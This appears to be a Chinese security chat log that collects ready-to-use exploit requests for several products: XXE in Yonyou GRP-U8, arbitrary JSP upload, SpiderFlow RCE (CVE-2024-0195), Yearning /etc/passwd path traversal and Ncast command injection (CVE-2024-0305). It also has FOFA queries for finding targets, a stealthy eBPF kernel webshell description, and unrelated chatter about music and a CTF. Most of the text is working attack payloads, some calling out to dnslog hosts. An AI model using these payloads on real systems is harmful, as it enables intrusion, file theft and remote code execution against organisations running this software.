用友GRP-U8 ufgovbank XXE漏洞

app="用友-GRP-U8"

POST /ufgovbank HTTP/1.1Host: 192.168.40.130:222User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Connection: closeContent-Length: 161Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipreqData=<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

在dnslog平台看到访问记录则存在漏洞

用友移动管理平台uploadIcon任意文件上传漏洞

POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 184Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWSL-CE-SUID: 15------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="file"; filename="c0fig.jsp"<% out.println("123");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

响应包中显示了上传后的文件路径

xray 1.95 高级版

SpiderFlow爬虫平台远程命令执行漏洞（CVE-2024-0195）


POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

dns平台收到ping请求记录则说明存在漏洞

Yearning front 任意文件读取漏洞

app="Yearning"

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate

新型内核马

无进程、无端口、无文件（注入后文件可删除）执行命令不会新建shell进程，无法通过常规行为检测

将WebShell注入内核，无法通过常规内存检测可改造内核马，适配HTTP协议以外的所有协议

通过ebpf hook入/出口流量，筛选出特定的恶意命令。再通过hook execve等函数，将其他进程正常执行的命令替换为恶意命令，达到WebShell的效果

项目地址:https://github.com/veo/ebpf_shell

http://47.100.228.108/

webshell在线检测

「一等情事」- 许一鸣
专辑: 一等情事
#网易云音乐 #flac 21.42MB 829.12kbps
via @Music163bot

这勾巴是啊啥这是中国人写的吗

CVE-2024-0305 Ncast盈可视高清智能录播系统busiFacade RCE漏洞

app="Ncast-产品" && noscript=="高清智能录播系统"

POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

【第六届腾讯信息安全争霸赛圆满结束，浙大AAA战队斩获冠军！-哔哩哔哩】 https://b23.tv/a9lfXvd

查询清华状态

无敌黑客网安孙笑川helen在加入本群时惨遭禁言，原因是做错了入群验证的二十以内加减法